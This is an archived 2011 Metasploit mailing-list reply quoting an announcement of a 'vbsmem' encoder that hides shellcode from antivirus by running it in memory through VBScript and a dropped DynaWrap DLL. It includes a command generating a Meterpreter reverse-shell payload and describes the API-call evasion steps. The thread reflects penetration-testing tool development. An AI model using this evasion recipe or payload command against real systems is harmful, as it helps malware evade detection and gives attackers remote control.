Metasploit mailing list archives
Re: Additional encoder option 'vbsmem' for AV bypass
From: "5.K1dd" <5.k1dd () austinhackers org>
Date: Sat, 05 Mar 2011 09:35:11 -0600
Nice! AV detection is the achilles heel of Metasploit. Efforts to bypass detection are always appreciated. Thanks, Blair. To the Metasploit Gods: Will this script be added to svn?
Hi, I've submitted a feature request with a patch included which implements a new VBScript-based encoder for msfencode. https://www.metasploit.com/redmine/issues/3894 You might want to use this if you find that your payloads are getting picked up by certain on access virus scanners... Full details are available in the ticket and included below the jump. Feedback or suggestions welcome. Thanks, Blair. ----------------------------------------------------------------- == SUMMARY == * New exe encoder option for metasploit (Adds "-t vbsmem" to msfencode) * Achieves 0/43 (no detection) on virustotal.com for arbitrary metasploit shellcode payloads. Straight revshell is 20/43. * Uses vbscript with DynaWrap COM control (dropped and registered) to directly execute shellcode in memory, without triggering on-access virus scanners. * Standard VBScript string obfuscation techniques are used to hide the actual shellcode from AV software. == Examples == Reverse shell ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.120.1 LPORT=4444 R | ./msfencode -t vbsmem > revshell.vbs Pop calc poc ./msfpayload windows/exec EXITFUNC=process CMD='calc.exe' R | ./msfencode -t vbsmem > popcalc.vbs == About == The first version of this encoder was written during a pentesting engagement. The target was running Microsoft Forefront Endpoint Protection with on-access scanning. It was possible to run commands, but I just couldn't get a meterpreter shell on there. After a frustrating session of multiply encoding, repacking and so on, the shellcode kept getting picked up. Existing VBScript payloads are not themselves picked up by AV, but when they drop files on the target, on-access scanning detects the payloads. After noting that the existing VBScript payloads themselves aren't picked up (just when they drop), I decided to apply a trick from Didier Stevens to execute the shellcode directly, without dropping. See: http://blog.didierstevens.com/2010/02/08/excel-with-cmd-dll-regedit-dll/ This encoder writes shellcode into a vbscript file which performs the following actions: * Drops Dynawrap.dll in TEMP * Manually registers the control under HKEY_CURRENT_USER * Uses DynaWrap.dll to call native APIs... o VirtualAlloc (make space) o WriteProcessMemory (copy shellcode) o CreateThread (execute) Standard VBScript string obfuscation techniques are used to hide the actual shellcode from AV software. == Licensing == The Dynawrap control was written by Ton Plooy and Jeff Strong and published in WDJ. As I understand it, this code is in the public domain and has been used in other open-source projects. The vbsmem code is provided under the same licensing terms as the metasploit project. _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Additional encoder option 'vbsmem' for AV bypass Blair Strang (Mar 04)
- Re: Additional encoder option 'vbsmem' for AV bypass 5.K1dd (Mar 05)